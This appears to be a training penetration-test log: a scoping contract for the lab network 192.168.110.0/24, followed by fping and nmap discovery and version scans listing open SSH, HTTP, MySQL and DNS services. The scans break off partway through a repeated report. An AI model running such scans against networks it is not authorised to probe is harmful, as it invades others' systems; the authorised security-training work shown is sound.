We have been hired to conduct a penetration test, here’s our contract
Contract
Customer / Emergency contact
Ralph Maurer, ralph.maurer@gibb.ch, +41 00 000 000
Contractor
-- your name --, email@osstmm.ch, +41 00 000 000
Statement of work
§ The contractor is hereby authorized to perform a penetration test of the network 192.168.110.0/24 between the
5th of november until 1st of december 2022 and excepted from all liability
§ Analysis: identify and verify vulnerabilities in target network
§ Scope: All identifiable hosts in target network 192.168.110.0/24
§ Attacker-IP: 192.168.120.51
§ Attack Vector: Attacker-IP à Gateway (192.168.120.1) à Target-Network
§ Test type: Blind / Black Box (https://thecyphere.com/blog/types-penetration-testing/)
Limits / prohibited actions:
§ Denial of service attacks are prohibited
§ No sniffing or ARP-spoofing
§ Exploitation of vulnerabilities may not be attempted without explicit consent of customer
192.168.110.1
192.168.110.40 ???
192.168.110.60
192.168.110.72
192.168.110.73
192.168.110.80
192.168.110.120
192.168.110.135
192.168.110.250
Network: 192.168.110.0/24
sudo fping -qasg 192.168.110.0/24 1 ⨯
192.168.110.1
192.168.110.60
192.168.110.73
192.168.110.120
192.168.110.135
192.168.110.250
254 targets
6 alive
248 unreachable
0 unknown addresses
992 timeouts (waiting for response)
998 ICMP Echos sent
6 ICMP Echo Replies received
11 other ICMP received
0.483 ms (min round trip time)
0.605 ms (avg round trip time)
0.802 ms (max round trip time)
9.797 sec (elapsed real time)
sudo nmap -PEPM -sn -n 192.168.110.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 09:29 CET
Nmap scan report for 192.168.110.1
Host is up (0.00087s latency).
Nmap scan report for 192.168.110.60
Host is up (0.0014s latency).
Nmap scan report for 192.168.110.73
Host is up (0.00098s latency).
Nmap scan report for 192.168.110.120
Host is up (0.00063s latency).
Nmap scan report for 192.168.110.135
Host is up (0.00055s latency).
Nmap scan report for 192.168.110.250
Host is up (0.00039s latency).
Nmap done: 256 IP addresses (6 hosts up) scanned in 1.32 seconds
sudo nmap -sV -T4 -Pn 192.168.110.0/24 -oA Scoping/host_discovery/nmap/tcp_fastscan
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 09:50 CET
Nmap scan report for 192.168.110.0
Host is up.
All 1000 scanned ports on 192.168.110.0 are filtered
Nmap scan report for if225-vmLF.smartlearn.lan (192.168.110.1)
Host is up (0.000037s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Unbound
81/tcp open http Apache httpd
222/tcp open ssh OpenSSH 8.6 (protocol 2.0)
444/tcp open ssl/http Apache httpd
Nmap scan report for 192.168.110.2
Host is up.
All 1000 scanned ports on 192.168.110.2 are filtered
Nmap scan report for 192.168.110.3
Host is up.
All 1000 scanned ports on 192.168.110.3 are filtered
Nmap scan report for 192.168.110.4
Host is up.
All 1000 scanned ports on 192.168.110.4 are filtered
Nmap scan report for 192.168.110.5
Host is up.
All 1000 scanned ports on 192.168.110.5 are filtered
Nmap scan report for 192.168.110.6
Host is up.
All 1000 scanned ports on 192.168.110.6 are filtered
Nmap scan report for 192.168.110.7
Host is up.
All 1000 scanned ports on 192.168.110.7 are filtered
Nmap scan report for 192.168.110.8
Host is up.
All 1000 scanned ports on 192.168.110.8 are filtered
Nmap scan report for 192.168.110.9
Host is up.
All 1000 scanned ports on 192.168.110.9 are filtered
Nmap scan report for 192.168.110.10
Host is up.
All 1000 scanned ports on 192.168.110.10 are filtered
Nmap scan report for 192.168.110.11
Host is up.
All 1000 scanned ports on 192.168.110.11 are filtered
Nmap scan report for 192.168.110.12
Host is up.
All 1000 scanned ports on 192.168.110.12 are filtered
Nmap scan report for 192.168.110.13
Host is up.
All 1000 scanned ports on 192.168.110.13 are filtered
Nmap scan report for 192.168.110.14
Host is up.
All 1000 scanned ports on 192.168.110.14 are filtered
Nmap scan report for 192.168.110.15
Host is up.
All 1000 scanned ports on 192.168.110.15 are filtered
Nmap scan report for 192.168.110.16
Host is up.
All 1000 scanned ports on 192.168.110.16 are filtered
Nmap scan report for 192.168.110.17
Host is up.
All 1000 scanned ports on 192.168.110.17 are filtered
Nmap scan report for 192.168.110.18
Host is up.
All 1000 scanned ports on 192.168.110.18 are filtered
Nmap scan report for 192.168.110.19
Host is up.
All 1000 scanned ports on 192.168.110.19 are filtered
Nmap scan report for 192.168.110.20
Host is up.
All 1000 scanned ports on 192.168.110.20 are filtered
Nmap scan report for 192.168.110.21
Host is up.
All 1000 scanned ports on 192.168.110.21 are filtered
Nmap scan report for 192.168.110.22
Host is up.
All 1000 scanned ports on 192.168.110.22 are filtered
Nmap scan report for 192.168.110.23
Host is up.
All 1000 scanned ports on 192.168.110.23 are filtered
Nmap scan report for 192.168.110.24
Host is up.
All 1000 scanned ports on 192.168.110.24 are filtered
Nmap scan report for 192.168.110.25
Host is up.
All 1000 scanned ports on 192.168.110.25 are filtered
Nmap scan report for 192.168.110.26
Host is up.
All 1000 scanned ports on 192.168.110.26 are filtered
Nmap scan report for 192.168.110.27
Host is up.
All 1000 scanned ports on 192.168.110.27 are filtered
Nmap scan report for 192.168.110.28
Host is up.
All 1000 scanned ports on 192.168.110.28 are filtered
Nmap scan report for 192.168.110.29
Host is up.
All 1000 scanned ports on 192.168.110.29 are filtered
Nmap scan report for 192.168.110.30
Host is up.
All 1000 scanned ports on 192.168.110.30 are filtered
Nmap scan report for 192.168.110.31
Host is up.
All 1000 scanned ports on 192.168.110.31 are filtered
Nmap scan report for 192.168.110.32
Host is up.
All 1000 scanned ports on 192.168.110.32 are filtered
Nmap scan report for 192.168.110.33
Host is up.
All 1000 scanned ports on 192.168.110.33 are filtered
Nmap scan report for 192.168.110.34
Host is up.
All 1000 scanned ports on 192.168.110.34 are filtered
Nmap scan report for 192.168.110.35
Host is up.
All 1000 scanned ports on 192.168.110.35 are filtered
Nmap scan report for 192.168.110.36
Host is up.
All 1000 scanned ports on 192.168.110.36 are filtered
Nmap scan report for 192.168.110.37
Host is up.
All 1000 scanned ports on 192.168.110.37 are filtered
Nmap scan report for 192.168.110.38
Host is up.
All 1000 scanned ports on 192.168.110.38 are filtered
Nmap scan report for 192.168.110.39
Host is up.
All 1000 scanned ports on 192.168.110.39 are filtered
Nmap scan report for li212-vmKL.smartlearn.lan (192.168.110.40)
Host is up.
All 1000 scanned ports on li212-vmKL.smartlearn.lan (192.168.110.40) are filtered
Nmap scan report for 192.168.110.41
Host is up.
All 1000 scanned ports on 192.168.110.41 are filtered
Nmap scan report for 192.168.110.42
Host is up.
All 1000 scanned ports on 192.168.110.42 are filtered
Nmap scan report for 192.168.110.43
Host is up.
All 1000 scanned ports on 192.168.110.43 are filtered
Nmap scan report for 192.168.110.44
Host is up.
All 1000 scanned ports on 192.168.110.44 are filtered
Nmap scan report for 192.168.110.45
Host is up.
All 1000 scanned ports on 192.168.110.45 are filtered
Nmap scan report for 192.168.110.46
Host is up.
All 1000 scanned ports on 192.168.110.46 are filtered
Nmap scan report for 192.168.110.47
Host is up.
All 1000 scanned ports on 192.168.110.47 are filtered
Nmap scan report for 192.168.110.48
Host is up.
All 1000 scanned ports on 192.168.110.48 are filtered
Nmap scan report for 192.168.110.49
Host is up.
All 1000 scanned ports on 192.168.110.49 are filtered
Nmap scan report for 192.168.110.50
Host is up.
All 1000 scanned ports on 192.168.110.50 are filtered
Nmap scan report for 192.168.110.51
Host is up.
All 1000 scanned ports on 192.168.110.51 are filtered
Nmap scan report for 192.168.110.52
Host is up.
All 1000 scanned ports on 192.168.110.52 are filtered
Nmap scan report for 192.168.110.53
Host is up.
All 1000 scanned ports on 192.168.110.53 are filtered
Nmap scan report for 192.168.110.54
Host is up.
All 1000 scanned ports on 192.168.110.54 are filtered
Nmap scan report for 192.168.110.55
Host is up.
All 1000 scanned ports on 192.168.110.55 are filtered
Nmap scan report for 192.168.110.56
Host is up.
All 1000 scanned ports on 192.168.110.56 are filtered
Nmap scan report for 192.168.110.57
Host is up.
All 1000 scanned ports on 192.168.110.57 are filtered
Nmap scan report for 192.168.110.58
Host is up.
All 1000 scanned ports on 192.168.110.58 are filtered
Nmap scan report for 192.168.110.59
Host is up.
All 1000 scanned ports on 192.168.110.59 are filtered
Nmap scan report for 192.168.110.60
Host is up (0.00059s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
3306/tcp open http nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.61
Host is up.
All 1000 scanned ports on 192.168.110.61 are filtered
Nmap scan report for 192.168.110.62
Host is up.
All 1000 scanned ports on 192.168.110.62 are filtered
Nmap scan report for 192.168.110.63
Host is up.
All 1000 scanned ports on 192.168.110.63 are filtered
Nmap scan report for 192.168.110.64
Host is up.
All 1000 scanned ports on 192.168.110.64 are filtered
Nmap scan report for 192.168.110.65
Host is up.
All 1000 scanned ports on 192.168.110.65 are filtered
Nmap scan report for 192.168.110.66
Host is up.
All 1000 scanned ports on 192.168.110.66 are filtered
Nmap scan report for 192.168.110.67
Host is up.
All 1000 scanned ports on 192.168.110.67 are filtered
Nmap scan report for 192.168.110.68
Host is up.
All 1000 scanned ports on 192.168.110.68 are filtered
Nmap scan report for 192.168.110.69
Host is up.
All 1000 scanned ports on 192.168.110.69 are filtered
Nmap scan report for 192.168.110.70
Host is up.
All 1000 scanned ports on 192.168.110.70 are filtered
Nmap scan report for 192.168.110.71
Host is up.
All 1000 scanned ports on 192.168.110.71 are filtered
Nmap scan report for 192.168.110.72
Host is up (0.00083s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
3306/tcp open mysql MySQL 5.7.35
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.73
Host is up (0.00044s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.74
Host is up.
All 1000 scanned ports on 192.168.110.74 are filtered
Nmap scan report for 192.168.110.75
Host is up.
All 1000 scanned ports on 192.168.110.75 are filtered
Nmap scan report for 192.168.110.76
Host is up.
All 1000 scanned ports on 192.168.110.76 are filtered
Nmap scan report for 192.168.110.77
Host is up.
All 1000 scanned ports on 192.168.110.77 are filtered
Nmap scan report for 192.168.110.78
Host is up.
All 1000 scanned ports on 192.168.110.78 are filtered
Nmap scan report for 192.168.110.79
Host is up.
All 1000 scanned ports on 192.168.110.79 are filtered
Nmap scan report for 192.168.110.80
Host is up (0.00063s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
3306/tcp open mysql MySQL 8.0.26-0ubuntu0.20.04.2
8080/tcp open http Apache httpd 2.4.41 ((Ubuntu))
8443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.81
Host is up.
All 1000 scanned ports on 192.168.110.81 are filtered
Nmap scan report for 192.168.110.82
Host is up.
All 1000 scanned ports on 192.168.110.82 are filtered
Nmap scan report for 192.168.110.83
Host is up.
All 1000 scanned ports on 192.168.110.83 are filtered
Nmap scan report for 192.168.110.84
Host is up.
All 1000 scanned ports on 192.168.110.84 are filtered
Nmap scan report for 192.168.110.85
Host is up.
All 1000 scanned ports on 192.168.110.85 are filtered
Nmap scan report for 192.168.110.86
Host is up.
All 1000 scanned ports on 192.168.110.86 are filtered
Nmap scan report for 192.168.110.87
Host is up.
All 1000 scanned ports on 192.168.110.87 are filtered
Nmap scan report for 192.168.110.88
Host is up.
All 1000 scanned ports on 192.168.110.88 are filtered
Nmap scan report for 192.168.110.89
Host is up.
All 1000 scanned ports on 192.168.110.89 are filtered
Nmap scan report for 192.168.110.90
Host is up.
All 1000 scanned ports on 192.168.110.90 are filtered
Nmap scan report for 192.168.110.91
Host is up.
All 1000 scanned ports on 192.168.110.91 are filtered
Nmap scan report for 192.168.110.92
Host is up.
All 1000 scanned ports on 192.168.110.92 are filtered
Nmap scan report for 192.168.110.93
Host is up.
All 1000 scanned ports on 192.168.110.93 are filtered
Nmap scan report for 192.168.110.94
Host is up.
All 1000 scanned ports on 192.168.110.94 are filtered
Nmap scan report for 192.168.110.95
Host is up.
All 1000 scanned ports on 192.168.110.95 are filtered
Nmap scan report for 192.168.110.96
Host is up.
All 1000 scanned ports on 192.168.110.96 are filtered
Nmap scan report for 192.168.110.97
Host is up.
All 1000 scanned ports on 192.168.110.97 are filtered
Nmap scan report for 192.168.110.98
Host is up.
All 1000 scanned ports on 192.168.110.98 are filtered
Nmap scan report for 192.168.110.99
Host is up.
All 1000 scanned ports on 192.168.110.99 are filtered
Nmap scan report for 192.168.110.100
Host is up.
All 1000 scanned ports on 192.168.110.100 are filtered
Nmap scan report for 192.168.110.101
Host is up.
All 1000 scanned ports on 192.168.110.101 are filtered
Nmap scan report for 192.168.110.102
Host is up.
All 1000 scanned ports on 192.168.110.102 are filtered
Nmap scan report for 192.168.110.103
Host is up.
All 1000 scanned ports on 192.168.110.103 are filtered
Nmap scan report for 192.168.110.104
Host is up.
All 1000 scanned ports on 192.168.110.104 are filtered
Nmap scan report for 192.168.110.105
Host is up.
All 1000 scanned ports on 192.168.110.105 are filtered
Nmap scan report for 192.168.110.106
Host is up.
All 1000 scanned ports on 192.168.110.106 are filtered
Nmap scan report for 192.168.110.107
Host is up.
All 1000 scanned ports on 192.168.110.107 are filtered
Nmap scan report for 192.168.110.108
Host is up.
All 1000 scanned ports on 192.168.110.108 are filtered
Nmap scan report for 192.168.110.109
Host is up.
All 1000 scanned ports on 192.168.110.109 are filtered
Nmap scan report for 192.168.110.110
Host is up.
All 1000 scanned ports on 192.168.110.110 are filtered
Nmap scan report for 192.168.110.111
Host is up.
All 1000 scanned ports on 192.168.110.111 are filtered
Nmap scan report for 192.168.110.112
Host is up.
All 1000 scanned ports on 192.168.110.112 are filtered
Nmap scan report for 192.168.110.113
Host is up.
All 1000 scanned ports on 192.168.110.113 are filtered
Nmap scan report for 192.168.110.114
Host is up.
All 1000 scanned ports on 192.168.110.114 are filtered
Nmap scan report for 192.168.110.115
Host is up.
All 1000 scanned ports on 192.168.110.115 are filtered
Nmap scan report for 192.168.110.116
Host is up.
All 1000 scanned ports on 192.168.110.116 are filtered
Nmap scan report for 192.168.110.117
Host is up.
All 1000 scanned ports on 192.168.110.117 are filtered
Nmap scan report for 192.168.110.118
Host is up.
All 1000 scanned ports on 192.168.110.118 are filtered
Nmap scan report for 192.168.110.119
Host is up.
All 1000 scanned ports on 192.168.110.119 are filtered
Nmap scan report for 192.168.110.120
Host is up (0.00049s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.121
Host is up.
All 1000 scanned ports on 192.168.110.121 are filtered
Nmap scan report for 192.168.110.122
Host is up.
All 1000 scanned ports on 192.168.110.122 are filtered
Nmap scan report for 192.168.110.123
Host is up.
All 1000 scanned ports on 192.168.110.123 are filtered
Nmap scan report for 192.168.110.124
Host is up.
All 1000 scanned ports on 192.168.110.124 are filtered
Nmap scan report for 192.168.110.125
Host is up.
All 1000 scanned ports on 192.168.110.125 are filtered
Nmap scan report for 192.168.110.126
Host is up.
All 1000 scanned ports on 192.168.110.126 are filtered
Nmap scan report for 192.168.110.127
Host is up.
All 1000 scanned ports on 192.168.110.127 are filtered
Nmap scan report for 192.168.110.128
Host is up.
All 1000 scanned ports on 192.168.110.128 are filtered
Nmap scan report for 192.168.110.129
Host is up.
All 1000 scanned ports on 192.168.110.129 are filtered
Nmap scan report for 192.168.110.130
Host is up.
All 1000 scanned ports on 192.168.110.130 are filtered
Nmap scan report for 192.168.110.131
Host is up.
All 1000 scanned ports on 192.168.110.131 are filtered
Nmap scan report for 192.168.110.132
Host is up.
All 1000 scanned ports on 192.168.110.132 are filtered
Nmap scan report for 192.168.110.133
Host is up.
All 1000 scanned ports on 192.168.110.133 are filtered
Nmap scan report for 192.168.110.134
Host is up.
All 1000 scanned ports on 192.168.110.134 are filtered
Nmap scan report for 192.168.110.135
Host is up (0.00071s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.136
Host is up.
All 1000 scanned ports on 192.168.110.136 are filtered
Nmap scan report for 192.168.110.137
Host is up.
All 1000 scanned ports on 192.168.110.137 are filtered
Nmap scan report for 192.168.110.138
Host is up.
All 1000 scanned ports on 192.168.110.138 are filtered
Nmap scan report for 192.168.110.139
Host is up.
All 1000 scanned ports on 192.168.110.139 are filtered
Nmap scan report for 192.168.110.140
Host is up.
All 1000 scanned ports on 192.168.110.140 are filtered
Nmap scan report for 192.168.110.141
Host is up.
All 1000 scanned ports on 192.168.110.141 are filtered
Nmap scan report for 192.168.110.142
Host is up.
All 1000 scanned ports on 192.168.110.142 are filtered
Nmap scan report for 192.168.110.143
Host is up.
All 1000 scanned ports on 192.168.110.143 are filtered
Nmap scan report for 192.168.110.144
Host is up.
All 1000 scanned ports on 192.168.110.144 are filtered
Nmap scan report for 192.168.110.145
Host is up.
All 1000 scanned ports on 192.168.110.145 are filtered
Nmap scan report for 192.168.110.146
Host is up.
All 1000 scanned ports on 192.168.110.146 are filtered
Nmap scan report for 192.168.110.147
Host is up.
All 1000 scanned ports on 192.168.110.147 are filtered
Nmap scan report for 192.168.110.148
Host is up.
All 1000 scanned ports on 192.168.110.148 are filtered
Nmap scan report for 192.168.110.149
Host is up.
All 1000 scanned ports on 192.168.110.149 are filtered
Nmap scan report for 192.168.110.150
Host is up.
All 1000 scanned ports on 192.168.110.150 are filtered
Nmap scan report for 192.168.110.151
Host is up.
All 1000 scanned ports on 192.168.110.151 are filtered
Nmap scan report for 192.168.110.152
Host is up.
All 1000 scanned ports on 192.168.110.152 are filtered
Nmap scan report for 192.168.110.153
Host is up.
All 1000 scanned ports on 192.168.110.153 are filtered
Nmap scan report for 192.168.110.154
Host is up.
All 1000 scanned ports on 192.168.110.154 are filtered
Nmap scan report for 192.168.110.155
Host is up.
All 1000 scanned ports on 192.168.110.155 are filtered
Nmap scan report for 192.168.110.156
Host is up.
All 1000 scanned ports on 192.168.110.156 are filtered
Nmap scan report for 192.168.110.157
Host is up.
All 1000 scanned ports on 192.168.110.157 are filtered
Nmap scan report for 192.168.110.158
Host is up.
All 1000 scanned ports on 192.168.110.158 are filtered
Nmap scan report for 192.168.110.159
Host is up.
All 1000 scanned ports on 192.168.110.159 are filtered
Nmap scan report for 192.168.110.160
Host is up.
All 1000 scanned ports on 192.168.110.160 are filtered
Nmap scan report for 192.168.110.161
Host is up.
All 1000 scanned ports on 192.168.110.161 are filtered
Nmap scan report for 192.168.110.162
Host is up.
All 1000 scanned ports on 192.168.110.162 are filtered
Nmap scan report for 192.168.110.163
Host is up.
All 1000 scanned ports on 192.168.110.163 are filtered
Nmap scan report for 192.168.110.164
Host is up.
All 1000 scanned ports on 192.168.110.164 are filtered
Nmap scan report for 192.168.110.165
Host is up.
All 1000 scanned ports on 192.168.110.165 are filtered
Nmap scan report for 192.168.110.166
Host is up.
All 1000 scanned ports on 192.168.110.166 are filtered
Nmap scan report for 192.168.110.167
Host is up.
All 1000 scanned ports on 192.168.110.167 are filtered
Nmap scan report for 192.168.110.168
Host is up.
All 1000 scanned ports on 192.168.110.168 are filtered
Nmap scan report for 192.168.110.169
Host is up.
All 1000 scanned ports on 192.168.110.169 are filtered
Nmap scan report for 192.168.110.170
Host is up.
All 1000 scanned ports on 192.168.110.170 are filtered
Nmap scan report for 192.168.110.171
Host is up.
All 1000 scanned ports on 192.168.110.171 are filtered
Nmap scan report for 192.168.110.172
Host is up.
All 1000 scanned ports on 192.168.110.172 are filtered
Nmap scan report for 192.168.110.173
Host is up.
All 1000 scanned ports on 192.168.110.173 are filtered
Nmap scan report for 192.168.110.174
Host is up.
All 1000 scanned ports on 192.168.110.174 are filtered
Nmap scan report for 192.168.110.175
Host is up.
All 1000 scanned ports on 192.168.110.175 are filtered
Nmap scan report for 192.168.110.176
Host is up.
All 1000 scanned ports on 192.168.110.176 are filtered
Nmap scan report for 192.168.110.177
Host is up.
All 1000 scanned ports on 192.168.110.177 are filtered
Nmap scan report for 192.168.110.178
Host is up.
All 1000 scanned ports on 192.168.110.178 are filtered
Nmap scan report for 192.168.110.179
Host is up.
All 1000 scanned ports on 192.168.110.179 are filtered
Nmap scan report for 192.168.110.180
Host is up.
All 1000 scanned ports on 192.168.110.180 are filtered
Nmap scan report for 192.168.110.181
Host is up.
All 1000 scanned ports on 192.168.110.181 are filtered
Nmap scan report for 192.168.110.182
Host is up.
All 1000 scanned ports on 192.168.110.182 are filtered
Nmap scan report for 192.168.110.183
Host is up.
All 1000 scanned ports on 192.168.110.183 are filtered
Nmap scan report for 192.168.110.184
Host is up.
All 1000 scanned ports on 192.168.110.184 are filtered
Nmap scan report for 192.168.110.185
Host is up.
All 1000 scanned ports on 192.168.110.185 are filtered
Nmap scan report for 192.168.110.186
Host is up.
All 1000 scanned ports on 192.168.110.186 are filtered
Nmap scan report for 192.168.110.187
Host is up.
All 1000 scanned ports on 192.168.110.187 are filtered
Nmap scan report for 192.168.110.188
Host is up.
All 1000 scanned ports on 192.168.110.188 are filtered
Nmap scan report for 192.168.110.189
Host is up.
All 1000 scanned ports on 192.168.110.189 are filtered
Nmap scan report for 192.168.110.190
Host is up.
All 1000 scanned ports on 192.168.110.190 are filtered
Nmap scan report for 192.168.110.191
Host is up.
All 1000 scanned ports on 192.168.110.191 are filtered
Nmap scan report for 192.168.110.192
Host is up.
All 1000 scanned ports on 192.168.110.192 are filtered
Nmap scan report for 192.168.110.193
Host is up.
All 1000 scanned ports on 192.168.110.193 are filtered
Nmap scan report for 192.168.110.194
Host is up.
All 1000 scanned ports on 192.168.110.194 are filtered
Nmap scan report for 192.168.110.195
Host is up.
All 1000 scanned ports on 192.168.110.195 are filtered
Nmap scan report for 192.168.110.196
Host is up.
All 1000 scanned ports on 192.168.110.196 are filtered
Nmap scan report for 192.168.110.197
Host is up.
All 1000 scanned ports on 192.168.110.197 are filtered
Nmap scan report for 192.168.110.198
Host is up.
All 1000 scanned ports on 192.168.110.198 are filtered
Nmap scan report for 192.168.110.199
Host is up.
All 1000 scanned ports on 192.168.110.199 are filtered
Nmap scan report for 192.168.110.200
Host is up.
All 1000 scanned ports on 192.168.110.200 are filtered
Nmap scan report for 192.168.110.201
Host is up.
All 1000 scanned ports on 192.168.110.201 are filtered
Nmap scan report for 192.168.110.202
Host is up.
All 1000 scanned ports on 192.168.110.202 are filtered
Nmap scan report for 192.168.110.203
Host is up.
All 1000 scanned ports on 192.168.110.203 are filtered
Nmap scan report for 192.168.110.204
Host is up.
All 1000 scanned ports on 192.168.110.204 are filtered
Nmap scan report for 192.168.110.205
Host is up.
All 1000 scanned ports on 192.168.110.205 are filtered
Nmap scan report for 192.168.110.206
Host is up.
All 1000 scanned ports on 192.168.110.206 are filtered
Nmap scan report for 192.168.110.207
Host is up.
All 1000 scanned ports on 192.168.110.207 are filtered
Nmap scan report for 192.168.110.208
Host is up.
All 1000 scanned ports on 192.168.110.208 are filtered
Nmap scan report for 192.168.110.209
Host is up.
All 1000 scanned ports on 192.168.110.209 are filtered
Nmap scan report for 192.168.110.210
Host is up.
All 1000 scanned ports on 192.168.110.210 are filtered
Nmap scan report for 192.168.110.211
Host is up.
All 1000 scanned ports on 192.168.110.211 are filtered
Nmap scan report for 192.168.110.212
Host is up.
All 1000 scanned ports on 192.168.110.212 are filtered
Nmap scan report for 192.168.110.213
Host is up.
All 1000 scanned ports on 192.168.110.213 are filtered
Nmap scan report for 192.168.110.214
Host is up.
All 1000 scanned ports on 192.168.110.214 are filtered
Nmap scan report for 192.168.110.215
Host is up.
All 1000 scanned ports on 192.168.110.215 are filtered
Nmap scan report for 192.168.110.216
Host is up.
All 1000 scanned ports on 192.168.110.216 are filtered
Nmap scan report for 192.168.110.217
Host is up.
All 1000 scanned ports on 192.168.110.217 are filtered
Nmap scan report for 192.168.110.218
Host is up.
All 1000 scanned ports on 192.168.110.218 are filtered
Nmap scan report for 192.168.110.219
Host is up.
All 1000 scanned ports on 192.168.110.219 are filtered
Nmap scan report for 192.168.110.220
Host is up.
All 1000 scanned ports on 192.168.110.220 are filtered
Nmap scan report for 192.168.110.221
Host is up.
All 1000 scanned ports on 192.168.110.221 are filtered
Nmap scan report for 192.168.110.222
Host is up.
All 1000 scanned ports on 192.168.110.222 are filtered
Nmap scan report for 192.168.110.223
Host is up.
All 1000 scanned ports on 192.168.110.223 are filtered
Nmap scan report for 192.168.110.224
Host is up.
All 1000 scanned ports on 192.168.110.224 are filtered
Nmap scan report for 192.168.110.225
Host is up.
All 1000 scanned ports on 192.168.110.225 are filtered
Nmap scan report for 192.168.110.226
Host is up.
All 1000 scanned ports on 192.168.110.226 are filtered
Nmap scan report for 192.168.110.227
Host is up.
All 1000 scanned ports on 192.168.110.227 are filtered
Nmap scan report for 192.168.110.228
Host is up.
All 1000 scanned ports on 192.168.110.228 are filtered
Nmap scan report for 192.168.110.229
Host is up.
All 1000 scanned ports on 192.168.110.229 are filtered
Nmap scan report for 192.168.110.230
Host is up.
All 1000 scanned ports on 192.168.110.230 are filtered
Nmap scan report for 192.168.110.231
Host is up.
All 1000 scanned ports on 192.168.110.231 are filtered
Nmap scan report for 192.168.110.232
Host is up.
All 1000 scanned ports on 192.168.110.232 are filtered
Nmap scan report for 192.168.110.233
Host is up.
All 1000 scanned ports on 192.168.110.233 are filtered
Nmap scan report for 192.168.110.234
Host is up.
All 1000 scanned ports on 192.168.110.234 are filtered
Nmap scan report for 192.168.110.235
Host is up.
All 1000 scanned ports on 192.168.110.235 are filtered
Nmap scan report for 192.168.110.236
Host is up.
All 1000 scanned ports on 192.168.110.236 are filtered
Nmap scan report for 192.168.110.237
Host is up.
All 1000 scanned ports on 192.168.110.237 are filtered
Nmap scan report for 192.168.110.238
Host is up.
All 1000 scanned ports on 192.168.110.238 are filtered
Nmap scan report for 192.168.110.239
Host is up.
All 1000 scanned ports on 192.168.110.239 are filtered
Nmap scan report for 192.168.110.240
Host is up.
All 1000 scanned ports on 192.168.110.240 are filtered
Nmap scan report for 192.168.110.241
Host is up.
All 1000 scanned ports on 192.168.110.241 are filtered
Nmap scan report for 192.168.110.242
Host is up.
All 1000 scanned ports on 192.168.110.242 are filtered
Nmap scan report for 192.168.110.243
Host is up.
All 1000 scanned ports on 192.168.110.243 are filtered
Nmap scan report for 192.168.110.244
Host is up.
All 1000 scanned ports on 192.168.110.244 are filtered
Nmap scan report for 192.168.110.245
Host is up.
All 1000 scanned ports on 192.168.110.245 are filtered
Nmap scan report for 192.168.110.246
Host is up.
All 1000 scanned ports on 192.168.110.246 are filtered
Nmap scan report for 192.168.110.247
Host is up.
All 1000 scanned ports on 192.168.110.247 are filtered
Nmap scan report for 192.168.110.248
Host is up.
All 1000 scanned ports on 192.168.110.248 are filtered
Nmap scan report for 192.168.110.249
Host is up.
All 1000 scanned ports on 192.168.110.249 are filtered
Nmap scan report for 192.168.110.250
Host is up (0.0012s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.251
Host is up.
All 1000 scanned ports on 192.168.110.251 are filtered
Nmap scan report for 192.168.110.252
Host is up.
All 1000 scanned ports on 192.168.110.252 are filtered
Nmap scan report for 192.168.110.253
Host is up.
All 1000 scanned ports on 192.168.110.253 are filtered
Nmap scan report for 192.168.110.254
Host is up.
All 1000 scanned ports on 192.168.110.254 are filtered
Nmap scan report for 192.168.110.255
Host is up.
All 1000 scanned ports on 192.168.110.255 are filtered
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (256 hosts up) scanned in 396.74 seconds
Nmap 7.91 scan initiated Sat Nov 19 09:50:12 2022 as: nmap -sV -T4 -Pn -oA Scoping/host_discovery/nmap/tcp_fastscan 192.168.110.0/24
Nmap scan report for if225-vmLF.smartlearn.lan (192.168.110.1)
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Unbound
81/tcp open http Apache httpd
222/tcp open ssh OpenSSH 8.6 (protocol 2.0)
444/tcp open ssl/http Apache httpd
Nmap scan report for li212-vmKL.smartlearn.lan (192.168.110.40)
Nmap scan report for 192.168.110.60
Not shown: 995 closed ports
